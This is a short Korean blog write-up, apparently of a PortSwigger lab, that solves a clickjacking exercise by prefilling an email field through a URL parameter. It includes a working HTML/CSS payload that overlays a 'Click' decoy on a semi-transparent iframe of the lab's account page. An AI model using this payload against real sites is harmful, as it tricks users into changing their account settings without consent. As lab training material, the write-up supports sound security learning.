728x90
이번 문제는 저번 문제의 확장으로 URL 매개변수를 사용하여 양식을 미리 채우고 사용자가 실수로 "이메일 업데이트" 버튼을 클릭하도록 유도하여 사용자의 이메일 주소를 변경하는 것이다.
문제가 풀리는 방식은 저번문제와 동일하게 click문자를 클릭하는 사용자를 속이면 된다.
우선 로그인을 하면 이메일 업데이트 버튼이 보이므로 저 버튼을 누르게 만들면 된다.
또한 url 매개변수를 사용하여 양식을 미리 채워야 되기 때문에 파라미터를 작성하여 양식이 채워지는지 확인해 본다.
url뒤에 email파라미터를 123으로 추가한 결과 이메일 입력칸에 123이 자동으로 채워지는 걸 확인할 수 있다.
이제 그럼 exploit 서버에서 사용자에게 보내면 된다
저번 문제와 동일하게 click 버튼을 이메일 업데이트 버튼 위로가게 만들고
email파라미터를 넣은 url을 넣어주면
<style>
iframe {
position:relative;
width:1700px;
height: 900px;
opacity: 0.5;
}
h1 {
position:absolute;
top:530px;
left:320px;
font-size:20;
}
</style>
<h1>Click</h1>
<iframe src="https://0a7d00ea03f1e7ab818d5318000a00c2.web-security-academy.net/my-account?email=adsf@naver.com" ></iframe>
이메일이 바뀌며 문제가 풀린다.
728x90
'Portswigger > Clickjacking' 카테고리의 다른 글
| Portsiwgger - Multistep clickjacking solution (0) | 2024.01.13 |
|---|---|
| Portswigger - Exploiting clickjacking vulnerability to trigger DOM-based XSS solution (0) | 2024.01.12 |
| Portswigger - Clickjacking with a frame buster script solution (0) | 2024.01.11 |
| Portsiwgger - Basic clickjacking with CSRF token protection (0) | 2024.01.04 |
